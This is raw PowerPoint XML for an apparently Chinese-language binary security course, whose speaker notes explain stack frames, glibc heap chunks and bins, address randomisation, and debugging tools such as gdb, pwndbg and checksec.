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media/image5.jpg" ContentType="image/png"/>
  <Override PartName="/ppt/notesSlides/notesSlide5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/media/image6.jpg" ContentType="image/png"/>
  <Override PartName="/ppt/media/image7.jpg" ContentType="image/png"/>
  <Override PartName="/ppt/media/image8.jpg" ContentType="image/png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notesMasterIdLst>
    <p:notesMasterId r:id="rId189"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="380" r:id="rId4"/>
    <p:sldId id="381" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="265" r:id="rId7"/>
    <p:sldId id="266" r:id="rId8"/>
    <p:sldId id="321" r:id="rId9"/>
    <p:sldId id="323" r:id="rId10"/>
    <p:sldId id="343" r:id="rId11"/>
    <p:sldId id="322" r:id="rId12"/>
    <p:sldId id="326" r:id="rId13"/>
    <p:sldId id="341" r:id="rId14"/>
    <p:sldId id="384" r:id="rId15"/>
    <p:sldId id="325" r:id="rId16"/>
    <p:sldId id="342" r:id="rId17"/>
    <p:sldId id="324" r:id="rId18"/>
    <p:sldId id="345" r:id="rId19"/>
    <p:sldId id="383" r:id="rId20"/>
    <p:sldId id="267" r:id="rId21"/>
    <p:sldId id="327" r:id="rId22"/>
    <p:sldId id="295" r:id="rId23"/>
    <p:sldId id="296" r:id="rId24"/>
    <p:sldId id="268" r:id="rId25"/>
    <p:sldId id="317" r:id="rId26"/>
    <p:sldId id="318" r:id="rId27"/>
    <p:sldId id="328" r:id="rId28"/>
    <p:sldId id="269" r:id="rId29"/>
    <p:sldId id="261" r:id="rId30"/>
    <p:sldId id="351" r:id="rId31"/>
    <p:sldId id="329" r:id="rId32"/>
    <p:sldId id="352" r:id="rId33"/>
    <p:sldId id="353" r:id="rId34"/>
    <p:sldId id="354" r:id="rId35"/>
    <p:sldId id="355" r:id="rId36"/>
    <p:sldId id="356" r:id="rId37"/>
    <p:sldId id="357" r:id="rId38"/>
    <p:sldId id="358" r:id="rId39"/>
    <p:sldId id="277" r:id="rId40"/>
    <p:sldId id="278" r:id="rId41"/>
    <p:sldId id="279" r:id="rId42"/>
    <p:sldId id="280" r:id="rId43"/>
    <p:sldId id="281" r:id="rId44"/>
    <p:sldId id="282" r:id="rId45"/>
    <p:sldId id="283" r:id="rId46"/>
    <p:sldId id="284" r:id="rId47"/>
    <p:sldId id="285" r:id="rId48"/>
    <p:sldId id="286" r:id="rId49"/>
    <p:sldId id="287" r:id="rId50"/>
    <p:sldId id="288" r:id="rId51"/>
    <p:sldId id="289" r:id="rId52"/>
    <p:sldId id="290" r:id="rId53"/>
    <p:sldId id="291" r:id="rId54"/>
    <p:sldId id="344" r:id="rId55"/>
    <p:sldId id="346" r:id="rId56"/>
    <p:sldId id="347" r:id="rId57"/>
    <p:sldId id="359" r:id="rId58"/>
    <p:sldId id="477" r:id="rId59"/>
    <p:sldId id="476" r:id="rId60"/>
    <p:sldId id="373" r:id="rId61"/>
    <p:sldId id="478" r:id="rId62"/>
    <p:sldId id="360" r:id="rId63"/>
    <p:sldId id="263" r:id="rId64"/>
    <p:sldId id="320" r:id="rId65"/>
    <p:sldId id="375" r:id="rId66"/>
    <p:sldId id="376" r:id="rId67"/>
    <p:sldId id="377" r:id="rId68"/>
    <p:sldId id="393" r:id="rId69"/>
    <p:sldId id="394" r:id="rId70"/>
    <p:sldId id="395" r:id="rId71"/>
    <p:sldId id="396" r:id="rId72"/>
    <p:sldId id="386" r:id="rId73"/>
    <p:sldId id="487" r:id="rId74"/>
    <p:sldId id="486" r:id="rId75"/>
    <p:sldId id="305" r:id="rId76"/>
    <p:sldId id="385" r:id="rId77"/>
    <p:sldId id="330" r:id="rId78"/>
    <p:sldId id="331" r:id="rId79"/>
    <p:sldId id="332" r:id="rId80"/>
    <p:sldId id="333" r:id="rId81"/>
    <p:sldId id="334" r:id="rId82"/>
    <p:sldId id="335" r:id="rId83"/>
    <p:sldId id="336" r:id="rId84"/>
    <p:sldId id="337" r:id="rId85"/>
    <p:sldId id="338" r:id="rId86"/>
    <p:sldId id="339" r:id="rId87"/>
    <p:sldId id="340" r:id="rId88"/>
    <p:sldId id="433" r:id="rId89"/>
    <p:sldId id="488" r:id="rId90"/>
    <p:sldId id="374" r:id="rId91"/>
    <p:sldId id="480" r:id="rId92"/>
    <p:sldId id="479" r:id="rId93"/>
    <p:sldId id="481" r:id="rId94"/>
    <p:sldId id="482" r:id="rId95"/>
    <p:sldId id="485" r:id="rId96"/>
    <p:sldId id="483" r:id="rId97"/>
    <p:sldId id="484" r:id="rId98"/>
    <p:sldId id="388" r:id="rId99"/>
    <p:sldId id="389" r:id="rId100"/>
    <p:sldId id="390" r:id="rId101"/>
    <p:sldId id="391" r:id="rId102"/>
    <p:sldId id="392" r:id="rId103"/>
    <p:sldId id="372" r:id="rId104"/>
    <p:sldId id="382" r:id="rId105"/>
    <p:sldId id="425" r:id="rId106"/>
    <p:sldId id="426" r:id="rId107"/>
    <p:sldId id="427" r:id="rId108"/>
    <p:sldId id="428" r:id="rId109"/>
    <p:sldId id="429" r:id="rId110"/>
    <p:sldId id="378" r:id="rId111"/>
    <p:sldId id="430" r:id="rId112"/>
    <p:sldId id="431" r:id="rId113"/>
    <p:sldId id="432" r:id="rId114"/>
    <p:sldId id="405" r:id="rId115"/>
    <p:sldId id="406" r:id="rId116"/>
    <p:sldId id="262" r:id="rId117"/>
    <p:sldId id="407" r:id="rId118"/>
    <p:sldId id="408" r:id="rId119"/>
    <p:sldId id="409" r:id="rId120"/>
    <p:sldId id="410" r:id="rId121"/>
    <p:sldId id="411" r:id="rId122"/>
    <p:sldId id="412" r:id="rId123"/>
    <p:sldId id="413" r:id="rId124"/>
    <p:sldId id="414" r:id="rId125"/>
    <p:sldId id="415" r:id="rId126"/>
    <p:sldId id="416" r:id="rId127"/>
    <p:sldId id="417" r:id="rId128"/>
    <p:sldId id="418" r:id="rId129"/>
    <p:sldId id="419" r:id="rId130"/>
    <p:sldId id="420" r:id="rId131"/>
    <p:sldId id="421" r:id="rId132"/>
    <p:sldId id="422" r:id="rId133"/>
    <p:sldId id="423" r:id="rId134"/>
    <p:sldId id="424" r:id="rId135"/>
    <p:sldId id="387" r:id="rId136"/>
    <p:sldId id="264" r:id="rId137"/>
    <p:sldId id="434" r:id="rId138"/>
    <p:sldId id="436" r:id="rId139"/>
    <p:sldId id="438" r:id="rId140"/>
    <p:sldId id="439" r:id="rId141"/>
    <p:sldId id="440" r:id="rId142"/>
    <p:sldId id="441" r:id="rId143"/>
    <p:sldId id="442" r:id="rId144"/>
    <p:sldId id="463" r:id="rId145"/>
    <p:sldId id="443" r:id="rId146"/>
    <p:sldId id="444" r:id="rId147"/>
    <p:sldId id="450" r:id="rId148"/>
    <p:sldId id="462" r:id="rId149"/>
    <p:sldId id="464" r:id="rId150"/>
    <p:sldId id="445" r:id="rId151"/>
    <p:sldId id="465" r:id="rId152"/>
    <p:sldId id="466" r:id="rId153"/>
    <p:sldId id="467" r:id="rId154"/>
    <p:sldId id="468" r:id="rId155"/>
    <p:sldId id="469" r:id="rId156"/>
    <p:sldId id="470" r:id="rId157"/>
    <p:sldId id="471" r:id="rId158"/>
    <p:sldId id="472" r:id="rId159"/>
    <p:sldId id="473" r:id="rId160"/>
    <p:sldId id="446" r:id="rId161"/>
    <p:sldId id="447" r:id="rId162"/>
    <p:sldId id="449" r:id="rId163"/>
    <p:sldId id="451" r:id="rId164"/>
    <p:sldId id="452" r:id="rId165"/>
    <p:sldId id="453" r:id="rId166"/>
    <p:sldId id="454" r:id="rId167"/>
    <p:sldId id="455" r:id="rId168"/>
    <p:sldId id="456" r:id="rId169"/>
    <p:sldId id="457" r:id="rId170"/>
    <p:sldId id="474" r:id="rId171"/>
    <p:sldId id="475" r:id="rId172"/>
    <p:sldId id="460" r:id="rId173"/>
    <p:sldId id="461" r:id="rId174"/>
    <p:sldId id="348" r:id="rId175"/>
    <p:sldId id="350" r:id="rId176"/>
    <p:sldId id="367" r:id="rId177"/>
    <p:sldId id="368" r:id="rId178"/>
    <p:sldId id="379" r:id="rId179"/>
    <p:sldId id="369" r:id="rId180"/>
    <p:sldId id="370" r:id="rId181"/>
    <p:sldId id="349" r:id="rId182"/>
    <p:sldId id="361" r:id="rId183"/>
    <p:sldId id="362" r:id="rId184"/>
    <p:sldId id="363" r:id="rId185"/>
    <p:sldId id="364" r:id="rId186"/>
    <p:sldId id="365" r:id="rId187"/>
    <p:sldId id="366" r:id="rId18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2DFDB"/>
    <a:srgbClr val="C5CAE9"/>
    <a:srgbClr val="9FA8DA"/>
    <a:srgbClr val="F0F4C3"/>
    <a:srgbClr val="C8E6C9"/>
    <a:srgbClr val="FFE0B2"/>
    <a:srgbClr val="FFCC80"/>
    <a:srgbClr val="FFECB3"/>
    <a:srgbClr val="C0F2DF"/>
    <a:srgbClr val="BEF4C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137" autoAdjust="0"/>
    <p:restoredTop sz="84481" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="96" d="100"/>
          <a:sy n="96" d="100"/>
        </p:scale>
        <p:origin x="102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54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide153.xml"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide158.xml"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide174.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide169.xml"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProp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65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide164.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide180.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide185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71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide170.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide175.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1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slide" Target="slides/slide165.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide181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72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide171.xml"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyle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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="pres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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2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0247AF-5B5C-4147-BFFB-F12477DB49FD}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2022/8/13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3F1BA8-EAFB-4D5B-B18D-35D07B5B660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19275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vim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>:%!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xxd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开启十六进制查看模式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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D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65142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Shape 2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68189626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5" name="Shape 20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6" name="Shape 20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Shape 20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2" name="Shape 20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4" name="Shape 20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5" name="Shape 20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1" name="Shape 21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2" name="Shape 21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7" name="Shape 21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8" name="Shape 2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3" name="Shape 211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4" name="Shape 21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9" name="Shape 21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0" name="Shape 21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5" name="Shape 212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6" name="Shape 212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1" name="Shape 21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2" name="Shape 21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8" name="Shape 213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9" name="Shape 21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子函数的参数保存在父函数栈帧的末尾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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D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3330588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0" name="Shape 20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1" name="Shape 20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88844343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0" name="Shape 20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1" name="Shape 20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/>
              <a:t>堆管理器是用户端代码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80655933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0" name="Shape 20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1" name="Shape 20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brk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统调用从操作系统获取内存方法：向低地址增长</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统调用直接申请一大块内存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36726308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0" name="Shape 20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1" name="Shape 20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/>
              <a:t>堆管理器会向操作系统要很大一块内存，再按照用户需求分小部分给用户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04962642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0" name="Shape 20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1" name="Shape 20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2410543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0" name="Shape 20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1" name="Shape 20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chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是内存分配的最小单位</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分配数据时，指针指向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>部分，而不是上面的控制结构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48664055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0" name="Shape 20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1" name="Shape 20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7832336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0" name="Shape 20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1" name="Shape 20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8899130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0" name="Shape 20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1" name="Shape 20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0" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>表示前一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>是否是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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malloced chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="12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2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sz="12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表示被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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free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prev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="12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记录上一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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free chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="12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的大小</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="12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size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="12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记录整个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="12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包括控制结构的大小</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="12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08840092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0" name="Shape 20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1" name="Shape 20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/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，也就是发现上一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>free chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，就会把这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和上一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>合并，并不再使用这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的控制字段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078167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Shape 2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939466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0" name="Shape 20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1" name="Shape 20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3496845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0" name="Shape 20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1" name="Shape 20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5711713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0" name="Shape 20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1" name="Shape 20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78733559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0" name="Shape 20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1" name="Shape 20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7418878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0" name="Shape 20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1" name="Shape 20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 err="1"/>
              <a:t>prev_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以被复用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17338775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0" name="Shape 20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1" name="Shape 20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7917241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0" name="Shape 20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1" name="Shape 20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9540767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0" name="Shape 20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1" name="Shape 20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7227685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0" name="Shape 20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1" name="Shape 20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192890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0" name="Shape 20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1" name="Shape 20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45579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Shape 2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66121251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0" name="Shape 20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1" name="Shape 20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3100460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0" name="Shape 20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1" name="Shape 20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8645252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0" name="Shape 20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1" name="Shape 20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4194308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0" name="Shape 20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1" name="Shape 20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mchunkptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[ NBINS * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ];</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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包含了剩下的三类数组：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unsorted bins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>small bins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>large bins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288955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0" name="Shape 20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1" name="Shape 20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/>
              <a:t>栈结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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prev_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实现的是物理链表？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>大小相对较小，满足要求的，会进入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>fast bins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96045582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0" name="Shape 20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1" name="Shape 20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3163485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0" name="Shape 20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1" name="Shape 20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/>
              <a:t>有各种大小的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，刚刚释放、不能进入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>chunk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/>
              <a:t>如果出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>large bins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>找不到满足用户要求的情况，会触发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>unsorted bins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>合并，合并完成之后，将对应大小的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>放入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>small bins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>large bins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96477065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0" name="Shape 20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1" name="Shape 20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1440638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0" name="Shape 20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1" name="Shape 20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6673067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0" name="Shape 20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1" name="Shape 20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77347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Shape 2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9588552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0" name="Shape 20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1" name="Shape 20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20390390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0" name="Shape 20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1" name="Shape 20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/>
              <a:t>一个双向链表上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>大小符合一个范围，不是固定的值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70137300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0" name="Shape 20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1" name="Shape 20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5362836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0" name="Shape 20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1" name="Shape 20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40273602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0" name="Shape 20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1" name="Shape 20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2729638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srgbClr val="24292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随机化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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文件的映射地址，是指</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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BSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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段地址随机化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>176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251166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gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是方便程序员调试程序的，调试中需要参考源代码文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwndbg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>更适用于只有二进制程序的情况</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>checksec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一起安装的命令行程序，可以显示保护措施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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>181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68502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Shape 2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4716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Shape 2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27408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Shape 2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40815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Shape 2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201074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Shape 2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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D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973950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Shape 2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/>
              <a:t>第一步是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>保存父函数的基地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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/>
              <a:t>最后一步是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ret </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回父函数</a:t>
            </a:r>
